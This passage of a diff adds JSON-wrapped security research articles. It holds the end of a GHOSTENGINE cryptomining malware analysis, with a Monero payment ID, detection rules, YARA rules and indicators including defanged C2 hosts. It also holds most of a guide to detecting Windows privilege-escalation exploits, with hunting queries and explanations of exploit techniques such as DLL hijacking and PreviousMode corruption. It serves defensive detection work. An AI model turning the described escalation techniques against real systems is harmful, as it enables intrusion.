is a blockchain cryptocurrency focusing on obfuscation and fungibility to ensure anonymity and privacy. The [Payment ID](https://www.getmonero.org/resources/moneropedia/paymentid.html) is an arbitrary and optional transaction attachment that consists of 32 bytes (64 hexadecimal characters) or 8 bytes (in the case of integrated addresses).\n\nUsing the Payment ID from the above configuration excerpt (`468ED2Qcchk4shLbD8bhbC3qz2GFXqjAUWPY3VGbmSM2jfJw8JpSDDXP5xpkMAHG98FHLmgvSM6ZfUqa9gvArUWP59tEd3f`), we can view the worker and pool statistics on one of the [Monero mining pool sites](https://monero.hashvault.pro/en/) listed in the configuration. \n\n\n\nAdditionally, we can see the transaction hashes, which we can look up on the Monero blockchain explorer. 
Note that while transactions date back four months ago, this only indicates the _potential_ monetary gain by this specific worker and account.\n\n\n\nUsing the Blockchain Explorer and one of the [transaction hashes](https://monero.hashvault.pro/explorer/prove/7c106041de7cc4c86cb9412a43cb7fc0a6ad2c76cfdb0e03a8ef98dd9e744442/468ED2Qcchk4shLbD8bhbC3qz2GFXqjAUWPY3VGbmSM2jfJw8JpSDDXP5xpkMAHG98FHLmgvSM6ZfUqa9gvArUWP59tEd3f/f1415e7710323cf769ce74d57ec9b7337d7a61b9ee4bba2ee38f9e8c3c067a005a484f8b9a14fb8964f56bb76181eafdb7dbb00677a155b067204423f23ab50ad146867795f560ad9443520f073f0bd71b8afd3259b24ae2a59aa7772f68fc028388f001bfeaa0f4ccc1f547b54924bb116352e9302424d731dc580dcccbb40749503640895d31559d7fc258b616576e7f052bbdbbc7083126f595c36015de02f6e95da8cfc81ee5fa1bd4d4c29bf55db96e4779924ab0d26993f7bf834ceb01fe314fd19e55c7304f91e809be3e29b68778f0da6dbcfe57d3eafc6dae5e090645d6b3753f44c4e1c1356b19d406c6efe7a55ec7c2b4997bd1fc65f15a4fda03619fc53beff111ddd9fd94f5ba3c503ccb73f52009bd3c1d47216b9a7c82d5065ac5e8a946e998cbc23fd8815a93cbbd655961709ac3ea8b1fd87e940e72370dc542ca4c22837e91ab5dd94d2c1c0a81e8ec9558766575ba236c3ae29b0f470fe881e22a03da405118a3353a5ecc618d1837e1a2bd449888a47a761efa98c407ce857fd389cdea63e9670edcf4b4d6c4c33e9c2851430270c8ef6dfb8cfeb9025ca7a17c9acdbfeb6670b3eabcbfde36cbc907e23fdd0c64aa2fc4103412a70c97838e177184c2f3d794e089b47ce66656d6c4cab2bbb4d6d71a3245f1dc360c7da9220eec90ef6e67cb13831b52ef14cf5bf1dd6adc202edc0892d9529145047786ed1042857f6986ed608839d595f06c1971f415f967d260d17ea8f5582400) we got from the Payment ID, we can see the public key, the amount is withdrawn, and when. Note that these public keys are used with one-time addresses, or stealth addresses that the adversary would then use a private key with to unlock the funds.\n\n\n\nIn the above example for transaction `7c106041de7cc4c86cb9412a43cb7fc0a6ad2c76cfdb0e03a8ef98dd9e744442` we can see that there was a withdrawal of `0.109900000000` XMR (the abbreviation for Monero) totaling $14.86 USD. 
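As a quick sanity check on these figures, the implied exchange rate at the time of the withdrawal can be worked out directly (Python; the values are taken from the transaction above, and the rate is approximate):

```python
# Reported withdrawal from the transaction above: 0.1099 XMR valued at $14.86 USD
xmr_amount = 0.109900000000
usd_value = 14.86

# Implied USD-per-XMR exchange rate at the time of the withdrawal
implied_rate = usd_value / xmr_amount
print(round(implied_rate, 2))  # ~135.21 USD per XMR
```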
The Monero Mining Pool site shows four transactions of approximately the same amount of XMR, totaling approximately $60.70 USD (January - March 2024).\n\nAs of the publication of this research, there are still active miners connected to the REF4578 Payment ID.\n\n\n\nWhile this specific Payment ID does not appear to be a big earner, it is evident that REF4578 could operate this intrusion set successfully. Other victims of this campaign could have different Payment IDs used to track intrusions, which could be combined for a larger overall haul.\n\n## Malware and MITRE ATT&CK\n\nElastic uses the [MITRE ATT&CK](https://attack.mitre.org/) framework to document common tactics, techniques, and procedures that threats use against enterprise networks.\n\n### Tactics\n\nTactics represent the _why_ of a technique or sub-technique. It is the adversary’s tactical goal: the reason for performing an action.\n\n* [Execution](https://attack.mitre.org/tactics/TA0002/)\n* [Persistence](https://attack.mitre.org/tactics/TA0003)\n* [Defense Evasion](https://attack.mitre.org/tactics/TA0005/)\n* [Discovery](https://attack.mitre.org/tactics/TA0007)\n* [Command and Control](https://attack.mitre.org/tactics/TA0011)\n* [Exfiltration](https://attack.mitre.org/tactics/TA0010/)\n* [Impact](https://attack.mitre.org/tactics/TA0040/)\n\n### Techniques\n\nTechniques represent _how_ an adversary achieves a tactical goal by performing an action.\n\n* [Command and Scripting Interpreter: PowerShell](https://attack.mitre.org/techniques/T1059/001/)\n* [Command and Scripting Interpreter: Windows Command Shell](https://attack.mitre.org/techniques/T1059/003/)\n* [Scheduled Task/Job: Scheduled Task](https://attack.mitre.org/techniques/T1053/005/)\n* [Indicator Removal: Clear Windows Event Logs](https://attack.mitre.org/techniques/T1070/001/)\n* [Masquerading](https://attack.mitre.org/techniques/T1036/)\n* [Process Injection](https://attack.mitre.org/techniques/T1055/)\n* [Process 
Discovery](https://attack.mitre.org/techniques/T1057/)\n* [Exfiltration Over C2 Channel](https://attack.mitre.org/techniques/T1041/)\n* [Data Encoding](https://attack.mitre.org/techniques/T1132)\n* [Resource Hijacking](https://attack.mitre.org/techniques/T1496/)\n* [Service Stop](https://attack.mitre.org/techniques/T1489/)\n\n## Mitigating GHOSTENGINE\n\n### Detection\n\nThe first objective of the GHOSTENGINE malware is to incapacitate endpoint security solutions and disable specific Windows event logs, such as Security and System logs, which record process creation and service registration. Therefore, it is crucial to prioritize the detection and prevention of these initial actions:\n\n* Suspicious PowerShell execution\n* Execution from unusual directories\n* Elevating privileges to system integrity\n* Deploying vulnerable drivers and establishing associated kernel mode services\n\nOnce the vulnerable drivers are loaded, detection opportunities decrease significantly, and organizations must find compromised endpoints that stop transmitting logs to their SIEM.\n\nNetwork traffic may be generated and identifiable if DNS record lookups point to [known mining pool](https://miningpoolstats.stream/monero) domains over well-known ports such as HTTP (`80`) and HTTPS (`443`). 
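This kind of DNS-based triage can be sketched as follows (Python; the event shape and the two pool domains are illustrative assumptions — a real hunt should use a maintained mining pool list such as the one linked above):

```python
# Illustrative triage sketch: flag DNS lookups whose registered domain matches
# a known Monero mining pool. The pool set below is a tiny sample only.
KNOWN_POOLS = {"supportxmr.com", "hashvault.pro"}

def is_pool_lookup(dns_question: str) -> bool:
    labels = dns_question.lower().rstrip(".").split(".")
    # Compare the registered domain (last two labels) against the pool list
    return ".".join(labels[-2:]) in KNOWN_POOLS

queries = ["pool.supportxmr.com", "www.example.com", "monero.hashvault.pro"]
print([q for q in queries if is_pool_lookup(q)])
```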
Stratum is also another popular network protocol for miners, by default, over port `4444`.\n\nThe analysis of this intrusion set revealed the following detection rules and behavior prevention events:\n\n* [Suspicious PowerShell Downloads](https://github.com/elastic/protections-artifacts/blob/ecde1dfa1aaeb6ace99e758c2ba7d2e499f93515/behavior/rules/execution_suspicious_powershell_downloads.toml)\n* [Service Control Spawned via Script Interpreter](https://github.com/elastic/detection-rules/blob/79f575b33c747e0c3c5f7293c95f3ddab611e683/rules/windows/privilege_escalation_service_control_spawned_script_int.toml)\n* [Local Scheduled Task Creation](https://github.com/elastic/detection-rules/blob/79f575b33c747e0c3c5f7293c95f3ddab611e683/rules/windows/persistence_local_scheduled_task_creation.toml)\n* [Process Execution from an Unusual Directory](https://github.com/elastic/detection-rules/blob/79f575b33c747e0c3c5f7293c95f3ddab611e683/rules/windows/defense_evasion_from_unusual_directory.toml)\n* [Svchost spawning Cmd](https://github.com/elastic/detection-rules/blob/79f575b33c747e0c3c5f7293c95f3ddab611e683/rules/windows/execution_command_shell_started_by_svchost.toml#L41)\n* [Unusual Parent-Child Relationship](https://github.com/elastic/detection-rules/blob/79f575b33c747e0c3c5f7293c95f3ddab611e683/rules/windows/execution_command_shell_started_by_svchost.toml#L41)\n* [Clearing Windows Event Logs](https://github.com/elastic/detection-rules/blob/79f575b33c747e0c3c5f7293c95f3ddab611e683/rules/windows/defense_evasion_clearing_windows_event_logs.toml)\n* [Microsoft Windows Defender Tampering](https://github.com/elastic/detection-rules/blob/79f575b33c747e0c3c5f7293c95f3ddab611e683/rules/windows/defense_evasion_microsoft_defender_tampering.toml)\n* [Potential Privilege Escalation via Missing DLL](https://github.com/elastic/protections-artifacts/blob/ecde1dfa1aaeb6ace99e758c2ba7d2e499f93515/behavior/rules/privilege_escalation_potential_privilege_escalation_via_missing_dll.toml)\n* 
[Binary Masquerading via Untrusted Path](https://github.com/elastic/protections-artifacts/blob/ecde1dfa1aaeb6ace99e758c2ba7d2e499f93515/behavior/rules/defense_evasion_binary_masquerading_via_untrusted_path.toml#L58)\n\n### Prevention\n\nMalicious Files Prevention : \n\n\n\nShellcode Injection Prevention:\n \n\n\nVulnerable Drivers file creation prevention ([Windows.VulnDriver.ArPot](https://github.com/elastic/protections-artifacts/blob/ecde1dfa1aaeb6ace99e758c2ba7d2e499f93515/yara/rules/Windows_VulnDriver_ArPot.yar) and [Windows.VulnDriver.IoBitUnlocker](https://github.com/elastic/protections-artifacts/blob/ecde1dfa1aaeb6ace99e758c2ba7d2e499f93515/yara/rules/Windows_VulnDriver_IoBitUnlocker.yar) )\n\n\n\n#### YARA\n\nElastic Security has created YARA rules to identify this activity. \n\n* [Windows Trojan GHOSTENGINE](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_GhostEngine.yar)\n* [Windows.VulnDriver.ArPot](https://github.com/elastic/protections-artifacts/blob/ecde1dfa1aaeb6ace99e758c2ba7d2e499f93515/yara/rules/Windows_VulnDriver_ArPot.yar)\n* [Windows.VulnDriver.IoBitUnlocker](https://github.com/elastic/protections-artifacts/blob/ecde1dfa1aaeb6ace99e758c2ba7d2e499f93515/yara/rules/Windows_VulnDriver_IoBitUnlocker.yar)\n\n## Observations\n\nAll observables are also available for [download](https://github.com/elastic/labs-releases/tree/main/indicators/ghostengine) in both ECS and STIX format.\n\nThe following observables were discussed in this research.\n\n| Observable | Type | Name | Reference |\n|------------------------------------------------------------------|-----------|-------------------------------------------------------------|------------------------------------|\n| `2fe78941d74d35f721556697491a438bf3573094d7ac091b42e4f59ecbd25753` | SHA-256 | `C:\\Windows\\Fonts\\smartsscreen.exe` | GHOSTENGINE EDR controller module |\n| `4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1` | SHA-256 | 
`C:\\Windows\\System32\\drivers\\aswArPots.sys` | Avast vulnerable driver |\n| `2b33df9aff7cb99a782b252e8eb65ca49874a112986a1c49cd9971210597a8ae` | SHA-256 | `C:\\Windows\\System32\\drivers\\IObitUnlockers.sys` | Iobit vulnerable driver |\n| `3ced0552b9ecf3dfecd14cbcc3a0d246b10595d5048d7f0d4690e26ecccc1150` | SHA-256 | `C:\\Windows\\System32\\oci.dll` | Update/Persistence module (64-bit) |\n| `3b2724f3350cb5f017db361bd7aae49a8dbc6faa7506de6a4b8992ef3fd9d7ab` | SHA-256 | `C:\\Windows\\System32\\oci.dll` | Update/Persistence module (32-bit) |\n| `35eb368c14ad25e3b1c58579ebaeae71bdd8ef7f9ccecfc00474aa066b32a03f` | SHA-256 | `C:\\Windows\\Fonts\\taskhostw.exe` | Miner client |\n| `786591953336594473d171e269c3617d7449876993b508daa9b96eedc12ea1ca` | SHA-256 | `C:\\Windows\\Fonts\\config.json` | Miner configuration file |\n| `11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5` | SHA-256 | `C:\\Windows\\Fonts\\WinRing0x64.sys` | Miner driver |\n| `aac7f8e174ba66d62620bd07613bac1947f996bb96b9627b42910a1db3d3e22b` | SHA-256 | `C:\\ProgramData\\Microsoft\\DeviceSync\\SystemSync\\Tiworker.exe` | Initial stager |\n| `6f3e913c93887a58e64da5070d96dc34d3265f456034446be89167584a0b347e` | SHA-256 | `backup.png` | GHOSTENGINE backdoor module |\n| `7c242a08ee2dfd5da8a4c6bc86231985e2c26c7b9931ad0b3ea4723e49ceb1c1` | SHA-256 | `get.png` | GHOSTENGINE loader |\n| `cc4384510576131c126db3caca027c5d159d032d33ef90ef30db0daa2a0c4104` | SHA-256 | `kill.png` | GHOSTENGINE EDR termination module |\n| `download.yrnvtklot[.]com` | domain | | C2 server |\n| `111.90.158[.]40` | ipv4-addr | | C2 server |\n| `ftp.yrnvtklot[.]com` | domain | | C2 server |\n| `93.95.225[.]137` | ipv4-addr | | C2 server |\n| `online.yrnvtklot[.]com` | domain | | C2 server |\n\n## References\n\nThe following were referenced throughout the above research:\n\n* https://www.antiy.com/response/HideShoveling.html\n"
+ },
+ "title": "Invisible miners: unveiling GHOSTENGINE’s crypto mining operations",
+ "slug": "invisible-miners-unveiling-ghostengine",
+ "date": "2024-05-22",
+ "description": "Elastic Security Labs has identified REF4578, an intrusion set incorporating several malicious modules and leveraging vulnerable drivers to disable known security solutions (EDRs) for crypto mining.",
+ "author": [
+ {
+ "slug": "salim-bitam"
+ },
+ {
+ "slug": "samir-bousseaden"
+ },
+ {
+ "slug": "terrance-dejesus"
+ },
+ {
+ "slug": "andrew-pease"
+ }
+ ],
+ "image": "ghostengine.jpg",
+ "category": [
+ {
+ "slug": "attack-pattern"
+ }
+ ],
+ "tags": [
+ "ref4578",
+ "ghostengine",
+ "xmrig",
+ "crypto",
+ "hiddenshovel"
+ ]
+ },
+ "id": "security_labs_content-invisible_miners_unveiling_ghostengine-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-itw_windows_lpe_0days_insights_and_detection_strategies-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-itw_windows_lpe_0days_insights_and_detection_strategies-md.json
new file mode 100644
index 00000000000..57896a71fc2
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-itw_windows_lpe_0days_insights_and_detection_strategies-md.json
@@ -0,0 +1,29 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"In-the-Wild Windows LPE 0-days: Insights & Detection Strategies\"\nslug: \"itw-windows-lpe-0days-insights-and-detection-strategies\"\ndate: \"2024-03-29\"\ndescription: \"This article will evaluate detection methods for Windows local privilege escalation techniques based on dynamic behavior analysis using Elastic Defend features.\"\nauthor:\n - slug: samir-bousseaden\nimage: \"image18.jpg\"\ncategory:\n - slug: security-operations\ntags:\n - slug: windows\n---\n\nBased on disclosures from [Microsoft](https://msrc.microsoft.com/update-guide/vulnerability), [Google](https://googleprojectzero.github.io/0days-in-the-wild/rca.html), [Kaspersky](https://securelist.com/windows-clfs-exploits-ransomware/111560/), [Checkpoint](https://research.checkpoint.com/2024/raspberry-robin-keeps-riding-the-wave-of-endless-1-days/), and other industry players, it has become apparent that in-the-wild Windows local privilege escalation (LPE) zero-days are increasingly prevalent and essential components in sophisticated cybercrime and APT arsenals. It is important for detection engineers to closely examine these publicly accessible samples and assess possible avenues for detection. \n\nThis article will not delve into the root cause or specific details of the vulnerabilities; however, we do provide links to appropriate vulnerability research articles. We will evaluate the detection methods based on dynamic behavior analysis using [Elastic Defend](https://docs.elastic.co/en/integrations/endpoint) features.\n\n## Case 1 - Common Log File System\n\n[The Common Log File System (CLFS)](https://learn.microsoft.com/en-us/windows-hardware/drivers/kernel/introduction-to-the-common-log-file-system) is a general-purpose logging service that can be used by software clients that need high-performance event logging. 
The [Microsoft Security Update Guide](https://msrc.microsoft.com/update-guide/) reveals that more than 30 CLFS vulnerabilities have been patched since 2018, 5 of which were observed during 2023 in ransomware attacks. 2024 also started with a [vulnerability report](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-20653) targeting the same CLFS driver (submitted by several researchers).\n\nYou can find an excellent series of write-ups delving into the internals of CLFS exploits [here](https://securelist.com/windows-clfs-exploits-ransomware/111560/). \nOne thing that those exploits have in common is that they leverage a few ```clfsw32.dll``` APIs (```CreateLogFile``` and ```AddLogContainer```) to create and manipulate BLF logs, allowing them to write or corrupt a kernel mode address. Combined with other exploitation primitives, this can lead to a successful elevation.\n\nBased on the specifics of these vulnerabilities, a high-level detection can be designed to identify unusual processes. For example, a process running as low or medium integrity can create BLF files followed by unexpectedly performing a system integrity-level activity (spawning a system child process, API call, file, or registry manipulation with system privileges). 
\n\nThe following EQL query can be used to correlate Elastic Defend file events where the call stack contains reference of the user mode APIs ```CreateLogFile``` or ```AddLogContainerSet```, specifically when running as normal user followed by the creation of child process running as SYSTEM:\n\n```\nsequence with maxspan=5m\n [file where event.action != \"deletion\" and not user.id : \"S-1-5-18\" and user.id != null and \n _arraysearch(process.thread.Ext.call_stack, $entry, \n $entry.symbol_info: (\"*clfsw32.dll!CreateLogFile*\", \"*clfsw32.dll!AddLogContainerSet*\"))] by process.entity_id\n [process where event.action == \"start\" and user.id : \"S-1-5-18\"] by process.parent.entity_id\n```\n\nThe following example is of matches on CVE-2022-24521 where ```cmd.exe``` is started as SYSTEM:\n\n\n\n\nThe following EQL query uses similar logic to the previous one, but instead of spawning a child process, it looks for API, file, or registry activity with SYSTEM privileges following the BLF file event:\n\n```\nsequence by process.entity_id \n [file where event.action != \"deletion\" and not user.id : \"S-1-5-18\" and user.id != null and \n _arraysearch(process.thread.Ext.call_stack, $entry, $entry.symbol_info : (\"*clfsw32.dll!CreateLogFile*\", \"*clfsw32.dll!AddLogContainerSet*\"))]\n [any where event.category : (\"file\", \"registry\", \"api\") and user.id : \"S-1-5-18\"]\n until [process where event.action:\"end\"] \n```\n\nThe following screenshot matches the cleanup phase of artifacts after the CLFS exploit elevated permissions (file deletion with system privileges):\n\n\n\n\nIn addition to the previous [two behavior detections](https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts%20CLFS&type=code), we can also leverage YARA to hunt for unsigned PE files that import the user mode APIs ```CreateLogFile``` or ```AddLogContainerSet``` and an atypical number of functions from ```clfsw32.dll``` (normal CLFS clients programs would import more functions from 
the same DLL):\n\n```\nimport \"pe\" \n\nrule lpe_clfs_strings {\n strings:\n $s1 = \"NtQuerySystemInformation\"\n $s2 = \"clfs.sys\" nocase\n condition:\n uint16(0)==0x5a4d and (pe.imports(\"clfsw32.dll\", \"CreateLogFile\") or pe.imports(\"clfsw32.dll\", \"AddLogContainer\")) and all of ($s*)\n}\n\nrule lpe_clfs_unsigned {\n condition:\n uint16(0)==0x5a4d and pe.number_of_signatures == 0 and filesize <= 200KB and \n (pe.imports(\"clfsw32.dll\", \"CreateLogFile\") or pe.imports(\"clfsw32.dll\", \"AddLogContainer\")) and \n not (pe.imports(\"clfsw32.dll\", \"ReadLogRecord\") or pe.imports(\"clfsw32.dll\", \"CreateLogMarshallingArea\"))\n}\n```\n\nBelow is an example of a [VT match](https://www.virustotal.com/gui/file/afb715f9a6747b4ae74a7880b5a60eb236d205248b3a6689938e3b7ba6e703fa) using Elastic’s YARA rules for [CVE-2023-28252](https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2023-28252):\n\n\n\nYARA rule match for CVE-2023-28252 \n\n## Case 2 - Windows DWM core library EoP\n\nDesktop Window Manager (```dwm.exe```) has been the compositing window manager in Microsoft Windows since Windows Vista. This program enables hardware acceleration to render the Windows graphical user interface and has high privileges; however, users with low privileges can interact with the DWM process, which significantly increases the attack surface. \n\nSecurity researcher [Quan Jin](https://twitter.com/jq0904) reported an in-the-wild vulnerability exploit for [CVE-2023-36033](https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2023-36033), and a detailed [writeup](https://googleprojectzero.github.io/0days-in-the-wild/0day-RCAs/2023/CVE-2023-36033.html) explaining the exploit's stages was later published by Google Project Zero. \n\nBased on our understanding, a DWM Core Library (```dwmcore.dll```) vulnerability exploit will most likely trigger shellcode execution in the ```dwm.exe``` process while running with Window Manager\\DWM user privilege. 
Note that this is high integrity but not yet SYSTEM. \n\nDetonating the ITW public sample on Elastic Defend indeed triggers a self-injection shellcode alert. Without prior knowledge and context, one may confuse it with a generic code injection alert or false positive since it’s a self-injection alert by a Microsoft trusted system binary with a normal parent process and no loaded malicious libraries. \n\nThe following KQL hunt can be used to find similar shellcode alerts: \n\n```\nevent.code : \"shellcode_thread\" and process.name : \"dwm.exe\" and user.name : DWM*\n```\n\n\n\n\nOther than shellcode execution, we can also look for unusual activity in ```dwm.exe``` by baselining child processes and file activity. Below, we can see an example of ```dwm.exe``` spawning ```cmd.exe``` as a result of exploitation:\n\n\n\n\nBased on our telemetry visibility, ```dwm.exe``` rarely spawns legitimate child processes. The following [detection](https://github.com/elastic/protections-artifacts/blob/72fd8cad90189e9d145d22eb3d4fee2fe3d5902f/behavior/rules/privilege_escalation_unusual_desktop_window_manager_child_process.toml) can be used to find abnormal ones: \n\n```\nprocess where event.action == \"start\" and\n process.parent.executable : \"?:\\\\Windows\\\\system32\\\\dwm.exe\" and user.id : (\"S-1-5-90-0-*\", \"S-1-5-18\") and process.executable : \"?:\\\\*\" and \n not process.executable : (\"?:\\\\Windows\\\\System32\\\\WerFault.exe\", \"?:\\\\Windows\\\\System32\\\\ISM.exe\", \"?:\\\\Windows\\\\system32\\\\dwm.exe\")\n```\n\n\n\nTo further elevate privileges from the Window Manager\\DWM user to SYSTEM, the shellcode drops a DLL to disk and places a JMP hook on the ```kernelbase!MapViewOfFile``` calls within the ```dwm.exe``` process. It then triggers a logoff by executing the ```shutdown /l``` command. \n\nThe logoff action triggers the execution of the ```LogonUI.exe``` process, which runs as a SYSTEM user. 
The ```LogonUI.exe``` process will communicate with the Desktop Window Manager process like any desktop GUI process, which will marshal/unmarshal Direct Composition objects. \n\nThe ```MapViewOfFile``` hook inside ```dwm.exe``` monitors the mapped heap content. When the resource heap data is unmarshalled within the ```LogonUI.exe``` process, the hook modifies it with another set of crafted gadgets used to execute a ```LoadLibraryA``` call on the dropped DLL. \n\nThe two main detection points here occur when ```dwm.exe``` drops a PE file to disk and when ```LogonUI.exe``` loads a DLL, with the call stack pointing to ```dcomp.dll``` - an indicator of marshaling/unmarshaling Direct Composition objects. \n\nBelow is a KQL query that looks for ```dwm.exe``` dropping a PE file to disk in both file events and malware alerts:\n\n```\n(event.category :\"file\" or event.code :\"malicious_file\") and \n\nprocess.name :\"dwm.exe\" and user.id:S-1-5-90-0-* and \n\n(file.extension :(dll or exe) or file.Ext.header_bytes :4d5a*) \n```\n\n\n\n\nBelow is a [detection](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/windows/privilege_escalation_potential_privilege_escalation_via_logonui.toml) EQL query that looks for the LogonUI DLL load hijack: \n\n```\nlibrary where process.executable : \"?:\\\\Windows\\\\System32\\\\LogonUI.exe\" and \n user.id : \"S-1-5-18\" and \n not dll.code_signature.status : \"trusted\" and \n process.thread.Ext.call_stack_summary : \"*combase.dll|dcomp.dll*\"\n```\n\n\n\n\n## Case 3 - Windows Activation Context EoP\n\n[CVE-2022-41073](https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2022/CVE-2022-41073.html) is another interesting in-the-wild vulnerability. The core issue is that a user can remap the root drive (```C:\\```) for privileged processes during impersonation. 
[This specific sample](https://www.virustotal.com/gui/file/e8a94466e64fb5f84eea5d8d1ba64054a61abf66fdf85ac160a95b204b7b19f3/details) tricks the ```printfilterpipelinesvc.exe``` process into loading an arbitrary DLL by redirecting the ```C:\\``` drive to ```C:\\OneDriveRoot``` during the [Activation Context](https://learn.microsoft.com/en-us/windows/win32/sbscs/activation-contexts) generation in the client server runtime subsystem (CSRSS). The redirected path masquerades as the legitimate ```C:\\Windows\\WinSxS``` directory, which is normally not writable by unprivileged users.\n\nFrom a behavioral perspective, this falls under the category of a SYSTEM integrity process loading a DLL that was dropped by a low/medium integrity process. There is also an element of masquerading as the legitimate Windows WinSxS folder.\n\nThe following EQL hunt can be used to find similar attempts to masquerade as trusted system folders for redirection: \n\n```\nany where (event.category in (\"file\", \"library\") or event.code : \"malicious_file\") and \n(\n file.path : (\"C:\\\\*\\\\Windows\\\\WinSxS\\\\*.dll\", \"C:\\\\*\\\\Windows\\\\system32\\\\*.dll\", \"C:\\\\*\\\\Windows\\\\syswow64\\\\*.dll\", \"C:\\\\*\\\\Windows\\\\assembly\\\\NativeImages*.dll\") or \n \n dll.path : (\"C:\\\\*\\\\Windows\\\\WinSxS\\\\*.dll\", \"C:\\\\*\\\\Windows\\\\system32\\\\*.dll\", \"C:\\\\*\\\\Windows\\\\syswow64\\\\*.dll\", \"C:\\\\*\\\\Windows\\\\assembly\\\\NativeImages*.dll\")\n )\n```\n\n\n\n\nThis also matches on [this](https://github.com/elastic/protections-artifacts/blob/72fd8cad90189e9d145d22eb3d4fee2fe3d5902f/behavior/rules/privilege_escalation_untrusted_dll_loaded_by_a_system_windows_process.toml) generic endpoint detection, which looks for untrusted modules loaded by elevated system native processes:\n\n\n\n\n## Generic Behavior Detection\n\nThe examples provided above illustrate that each vulnerability possesses distinct characteristics. 
Exploitation methods vary depending on the flexibility of primitives, such as writing to an address, executing shellcode, loading an arbitrary DLL, or creating a file. Certain system components may harbor more vulnerabilities than others, warranting dedicated detection efforts (e.g., CLFS, win32k).\n\nNevertheless, these vulnerabilities' ultimate objective and impact remain consistent. This underscores the opportunity to devise more effective detection strategies.\n\nPrivilege escalation can manifest in various forms:\n - A low/medium integrity process spawning an elevated child process\n - A low/medium integrity process injecting code into an elevated process\n - A system integrity process unexpectedly loading an untrusted DLL\n - A system native process unexpectedly dropping PE files\n - A low/medium integrity process dropping files to system-protected folders\n - A user-mode process writing to a kernel mode address\n\nLeveraging Elastic Defend’s capabilities, we can design detections and hunt for each of the possibilities above.\n\n**Low/Medium integrity process spawning an elevated child process**:\n\n```\nsequence with maxspan=5m\n [process where event.action == \"start\" and\n process.Ext.token.integrity_level_name in (\"medium\", \"low\")] by process.entity_id\n [process where event.action == \"start\" and\n process.Ext.token.integrity_level_name == \"system\" and user.id : \"S-1-5-18\"] by process.parent.entity_id\n```\n\nExample of matches on a [sample](https://www.virustotal.com/gui/file/b17c0bdffa9086531e05677aad51252c6a883598109473fc2f4b4b8bfec8b6d3/) exploiting a vulnerable driver (Zemana `zam64.sys`) to spawn `cmd.exe` as SYSTEM: \n\n\n\n\n**Low/medium integrity process injecting code into an elevated process**:\n\nHere is an [ES|QL](https://www.elastic.co/guide/en/elasticsearch/reference/current/esql.html) query to look for rare cross-process API calls: \n\n```\nfrom logs-endpoint.events.api*\n| where process.Ext.token.integrity_level_name in (\"medium\", 
\"low\") and Target.process.Ext.token.integrity_level_name == \"system\" and\n process.Ext.api.name in (\"WriteProcessMemory\", \"VirtualProtect\", \"VirtualAllocEx\", \"VirtualProtectEx\", \"QueueUserAPC\", \"MapViewOfFile\", \"MapViewOfFileEx\")\n| stats occurrences = count(*), agents = count_distinct(host.id) by process.Ext.api.name, process.executable, Target.process.executable\n| where agents == 1 and occurrences <= 100\n```\n\nWhen we run this query, we get LPE exploits injecting into ```winlogon.exe``` post-elevation via token swapping: \n\n\n\n\n**System integrity process unexpectedly loads an untrusted DLL**\n\nHere’s an ES|QL query to look for rare unsigned DLLs that have been loaded by an elevated Microsoft binary: \n\n```\nfrom logs-endpoint.events.library-*\n| where host.os.family == \"windows\" and event.action == \"load\" and\n starts_with(process.code_signature.subject_name, \"Microsoft\") and \n user.id in (\"S-1-5-18\", \"S-1-5-19\", \"S-1-5-20\") and \n process.code_signature.status == \"trusted\" and \n dll.Ext.relative_file_creation_time <= 500 and\n (dll.code_signature.exists == false or dll.code_signature.trusted == false) and \n\n /* excluding noisy DLL paths */ \n not dll.path rlike \"\"\"[C-F]:\\\\Windows\\\\(assembly|WinSxS|SoftwareDistribution|SystemTemp)\\\\.+\\.dll\"\"\" and\n\n /* excluding noisy processes and potentially unrelated to exploits - svchost must be covered by a dedicated hunt to exclude service dlls and COM */\nnot process.name in (\"rundll32.exe\", \"regsvr32.exe\", \"powershell.exe\", \"msiexec.exe\", \"svchost.exe\", \"w3wp.exe\", \"mscorsvw.exe\", \"OfficeClickToRun.exe\", \"SetupHost.exe\", \"UpData.exe\", \"DismHost.exe\")\n\n| stats occurrences = count(*), host_count = count_distinct(host.id) by dll.name, process.name\n/* loaded once and the couple dll.name process.name are present in one agent across the fleet */\n| where occurrences == 1 and host_count == 1\n```\n\n\n\n\n**A system native process unexpectedly 
drops PE files**\n\nThe following ES|QL query can be used to hunt for instances of a privileged Microsoft signed binary that has a low count of executable file creation history and is limited to one agent across the fleet of monitored hosts: \n\n```\nfrom logs-endpoint.events.file-*\n| where @timestamp > now() - 30 day\n| where host.os.family == \"windows\" and event.category == \"file\" and event.action == \"creation\" and user.id in (\"S-1-5-18\", \"S-1-5-19\", \"S-1-5-20\", \"S-1-5-90-0-*\") and\n starts_with(file.Ext.header_bytes, \"4d5a\") and process.code_signature.status == \"trusted\" and\n starts_with(process.code_signature.subject_name, \"Microsoft\") and \n process.executable rlike \"\"\"[c-fC-F]:\\\\Windows\\\\(System32|SysWOW64)\\\\[a-zA-Z0-9_]+.exe\"\"\" and\n not process.name in (\"drvinst.exe\", \"MpSigStub.exe\", \"cmd.exe\")\n| keep process.executable, host.id\n| stats occurrences = count(*), agents = count_distinct(host.id) by process.executable\n| where agents == 1 and occurrences == 1\n```\n\n\n\n\n**User-mode process writing to a kernel mode address**\n\nCorrupting [PreviousMode](https://learn.microsoft.com/en-us/windows-hardware/drivers/kernel/previousmode) is a widely popular exploitation technique. Overwriting this one byte in the [KTHREAD](https://www.geoffchappell.com/studies/windows/km/ntoskrnl/inc/ntos/ke/kthread/index.htm) structure bypasses kernel-mode checks inside syscalls such as ```NtReadVirtualMemory``` or ```NtWriteVirtualMemory```, allowing a user-mode attacker to read and write arbitrary kernel memory.\n\nOn x64, the virtual address space is divided into the user mode addresses ranging from ```0x00000000 00000000``` - ```0x0000FFFF FFFFFFFF``` and the kernel mode address ranging from 